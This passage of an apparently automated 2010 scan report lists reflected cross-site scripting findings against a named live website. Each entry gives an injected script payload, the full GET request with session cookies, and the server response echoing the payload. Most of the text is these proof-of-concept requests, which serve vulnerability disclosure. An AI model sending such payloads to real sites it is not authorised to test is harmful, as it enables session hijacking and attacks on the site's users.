...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/plugins/sociablede545\"><script>alert(1)</script>42ecccfeb5e/sociable.css"/>
...[SNIP]...

1.39. http://izea.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94f7e"><script>alert(1)</script>0aa62759a4d was submitted in the REST URL parameter 4. This input was echoed as 94f7e\"><script>alert(1)</script>0aa62759a4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sociable/sociable.css94f7e"><script>alert(1)</script>0aa62759a4d HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:21:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:21:57 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-content/plugins/sociable/sociable.css94f7e\"><script>alert(1)</script>0aa62759a4d"/>
...[SNIP]...

1.40. http://izea.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-includes/js/jquery/jquery.form.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f32a"><script>alert(1)</script>5f7bec5070 was submitted in the REST URL parameter 1. This input was echoed as 5f32a\"><script>alert(1)</script>5f7bec5070 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes5f32a"><script>alert(1)</script>5f7bec5070/js/jquery/jquery.form.js HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:17:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:17:15 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-includes5f32a\"><script>alert(1)</script>5f7bec5070/js/jquery/jquery.form.js"/>
...[SNIP]...

1.41. http://izea.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-includes/js/jquery/jquery.form.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a575"><script>alert(1)</script>d1382bff359 was submitted in the REST URL parameter 2. This input was echoed as 6a575\"><script>alert(1)</script>d1382bff359 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js6a575"><script>alert(1)</script>d1382bff359/jquery/jquery.form.js HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:18:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:18:38 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-includes/js6a575\"><script>alert(1)</script>d1382bff359/jquery/jquery.form.js"/>
...[SNIP]...

1.42. http://izea.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-includes/js/jquery/jquery.form.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef407"><script>alert(1)</script>faa50c964df was submitted in the REST URL parameter 3. This input was echoed as ef407\"><script>alert(1)</script>faa50c964df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jqueryef407"><script>alert(1)</script>faa50c964df/jquery.form.js HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:20:17 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:20:20 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-includes/js/jqueryef407\"><script>alert(1)</script>faa50c964df/jquery.form.js"/>
...[SNIP]...

1.43. http://izea.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-includes/js/jquery/jquery.form.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30a7d"><script>alert(1)</script>fe21e1acb20 was submitted in the REST URL parameter 4. This input was echoed as 30a7d\"><script>alert(1)</script>fe21e1acb20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/jquery.form.js30a7d"><script>alert(1)</script>fe21e1acb20 HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:21:58 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:22:01 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-includes/js/jquery/jquery.form.js30a7d\"><script>alert(1)</script>fe21e1acb20"/>
...[SNIP]...

1.44. http://izea.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1668d"><script>alert(1)</script>d5d19270a6c was submitted in the REST URL parameter 1. This input was echoed as 1668d\"><script>alert(1)</script>d5d19270a6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes1668d"><script>alert(1)</script>d5d19270a6c/js/jquery/jquery.js HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:18:02 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:18:03 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-includes1668d\"><script>alert(1)</script>d5d19270a6c/js/jquery/jquery.js"/>
...[SNIP]...

1.45. http://izea.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e564a"><script>alert(1)</script>e608e301c93 was submitted in the REST URL parameter 2. This input was echoed as e564a\"><script>alert(1)</script>e608e301c93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/jse564a"><script>alert(1)</script>e608e301c93/jquery/jquery.js HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:19:45 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:19:49 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-includes/jse564a\"><script>alert(1)</script>e608e301c93/jquery/jquery.js"/>
...[SNIP]...

1.46. http://izea.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd604"><script>alert(1)</script>af0c70971ab was submitted in the REST URL parameter 3. This input was echoed as cd604\"><script>alert(1)</script>af0c70971ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquerycd604"><script>alert(1)</script>af0c70971ab/jquery.js HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:21:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:21:18 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-includes/js/jquerycd604\"><script>alert(1)</script>af0c70971ab/jquery.js"/>
...[SNIP]...

1.47. http://izea.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15a30"><script>alert(1)</script>144bb7a5ff4 was submitted in the REST URL parameter 4. This input was echoed as 15a30\"><script>alert(1)</script>144bb7a5ff4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/jquery.js15a30"><script>alert(1)</script>144bb7a5ff4 HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:23:18 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:23:21 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/wp-includes/js/jquery/jquery.js15a30\"><script>alert(1)</script>144bb7a5ff4"/>
...[SNIP]...

1.48. http://izea.com/xmlrpc.php [REST URL parameter 1]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://izea.com
Path:   /xmlrpc.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af86f"><script>alert(1)</script>2dc14f09047 was submitted in the REST URL parameter 1. This input was echoed as af86f\"><script>alert(1)</script>2dc14f09047 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xmlrpc.phpaf86f"><script>alert(1)</script>2dc14f09047 HTTP/1.1
Host: izea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250356574.1288966493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=q4l4vlmp21ccfoodh0cphukvr4; __utma=250356574.1967549305.1288966493.1288966493.1288966493.1; SnapABugRef=http%3A%2F%2Fizea.com%2F%20; __utmc=250356574; __utmb=250356574.5.10.1288966493; sifrFetch=true;

Response

HTTP/1.1 404 Not Found
Date: Fri, 05 Nov 2010 14:17:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://izea.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 05 Nov 2010 14:17:34 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://izea.com/xmlrpc.phpaf86f\"><script>alert(1)</script>2dc14f09047"/>
...[SNIP]...

Report generated by XSS.CX at Fri Nov 05 09:32:13 CDT 2010.